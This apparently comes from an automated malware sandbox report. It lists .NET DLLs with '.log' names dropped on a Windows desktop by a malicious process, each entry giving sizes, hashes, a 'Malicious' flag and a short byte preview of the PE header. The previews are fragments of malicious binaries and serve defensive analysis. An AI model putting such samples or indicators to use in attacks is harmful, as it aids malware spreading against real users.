SHA-512:	39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\sfUBdVXw.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\slzTDrMW.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33792
Entropy (8bit):	5.541771649974822
Encrypted:	false
SSDEEP:	768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
MD5:	2D6975FD1CC3774916D8FF75C449EE7B
SHA1:	0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
SHA-256:	75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
SHA-512:	6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....\|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...\|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\spVQuoXR.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	40448
Entropy (8bit):	5.7028690200758465
Encrypted:	false
SSDEEP:	768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
MD5:	51B1964F31C557AE8C2B01EA164ABD9F
SHA1:	97C6E8FD1F21D644281FAF82D017969FE22423E4
SHA-256:	AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
SHA-512:	5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\sqwCQUcY.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\swbUrqRy.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34816
Entropy (8bit):	5.636032516496583
Encrypted:	false
SSDEEP:	384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
MD5:	996BD447A16F0A20F238A611484AFE86
SHA1:	CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
SHA-256:	0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
SHA-512:	80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\tGqbwPqT.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38400
Entropy (8bit):	5.699005826018714
Encrypted:	false
SSDEEP:	768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
MD5:	87765D141228784AE91334BAE25AD743
SHA1:	442BA48B1B5BB158E2E6145B0592F81D20CB9C57
SHA-256:	9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
SHA-512:	77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\tLQsTXtO.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	64000
Entropy (8bit):	5.857602289000348
Encrypted:	false
SSDEEP:	768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
MD5:	5EE7E079F998F80293B3467CE6A5B4AE
SHA1:	3C0932D48F3542E9DFB09AD9E1FF70891A038532
SHA-256:	A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
SHA-512:	056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........\|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\tuDcNqgt.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	294912
Entropy (8bit):	6.010605469502259
Encrypted:	false
SSDEEP:	6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
MD5:	00574FB20124EAFD40DC945EC86CA59C
SHA1:	8B96C4B6F450E711085AE7B22517C195222ACFDF
SHA-256:	3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
SHA-512:	B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

C:\Users\user\Desktop\uFzSfHem.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33792
Entropy (8bit):	5.541771649974822
Encrypted:	false
SSDEEP:	768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
MD5:	2D6975FD1CC3774916D8FF75C449EE7B
SHA1:	0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
SHA-256:	75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
SHA-512:	6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....\|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...\|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\uIPRftWP.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	294912
Entropy (8bit):	6.010605469502259
Encrypted:	false
SSDEEP:	6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
MD5:	00574FB20124EAFD40DC945EC86CA59C
SHA1:	8B96C4B6F450E711085AE7B22517C195222ACFDF
SHA-256:	3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
SHA-512:	B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

C:\Users\user\Desktop\uNikKqFs.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	64000
Entropy (8bit):	5.857602289000348
Encrypted:	false
SSDEEP:	768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
MD5:	5EE7E079F998F80293B3467CE6A5B4AE
SHA1:	3C0932D48F3542E9DFB09AD9E1FF70891A038532
SHA-256:	A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
SHA-512:	056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........\|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\uqqCdnCx.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\urIzQXcN.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	64000
Entropy (8bit):	5.857602289000348
Encrypted:	false
SSDEEP:	768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
MD5:	5EE7E079F998F80293B3467CE6A5B4AE
SHA1:	3C0932D48F3542E9DFB09AD9E1FF70891A038532
SHA-256:	A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
SHA-512:	056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........\|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\utjkmEhT.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	46592
Entropy (8bit):	5.870612048031897
Encrypted:	false
SSDEEP:	768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
MD5:	3601048DFB8C4A69313A593E74E5A2DE
SHA1:	A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
SHA-256:	F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
SHA-512:	B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\uzrRvGCS.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\vodJuMXp.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.629584586954759
Encrypted:	false
SSDEEP:	768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
MD5:	D478E398EFCD2BD9BDBFEA958F7BEE4F
SHA1:	24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
SHA-256:	32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
SHA-512:	0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\vqKsIEwO.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.629584586954759
Encrypted:	false
SSDEEP:	768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
MD5:	D478E398EFCD2BD9BDBFEA958F7BEE4F
SHA1:	24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
SHA-256:	32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
SHA-512:	0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\wQKprcQn.log

Download File

Process:	C:\Users\user\Desktop\FuWRu2Mg82.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	64000
Entropy (8bit):	5.857602289000348
Encrypted:	false
SSDEEP:	768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
MD5:	5EE7E079F998F80293B3467CE6A5B4AE
SHA1:	3C0932D48F3542E9DFB09AD9E1FF70891A038532
SHA-256:	A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
SHA-512:	056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........\|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\wSNBpqnJ.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.629584586954759
Encrypted:	false
SSDEEP:	768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
MD5:	D478E398EFCD2BD9BDBFEA958F7BEE4F
SHA1:	24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
SHA-256:	32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
SHA-512:	0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\waDRLkih.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.629584586954759
Encrypted:	false
SSDEEP:	768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
MD5:	D478E398EFCD2BD9BDBFEA958F7BEE4F
SHA1:	24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
SHA-256:	32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
SHA-512:	0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\wnSKynRr.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	50176
Entropy (8bit):	5.723168999026349
Encrypted:	false
SSDEEP:	768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
MD5:	2E116FC64103D0F0CF47890FD571561E
SHA1:	3EF08A9B057D1876C24FC76E937CDA461FAC6071
SHA-256:	25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
SHA-512:	39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\xDZbRmFl.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38912
Entropy (8bit):	5.679286635687991
Encrypted:	false
SSDEEP:	768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
MD5:	9E910782CA3E88B3F87826609A21A54E
SHA1:	8DBC333244620EDA5D3F1C9EAA6B924455262303
SHA-256:	3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
SHA-512:	592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\xchRfZTn.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38400
Entropy (8bit):	5.699005826018714
Encrypted:	false
SSDEEP:	768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
MD5:	87765D141228784AE91334BAE25AD743
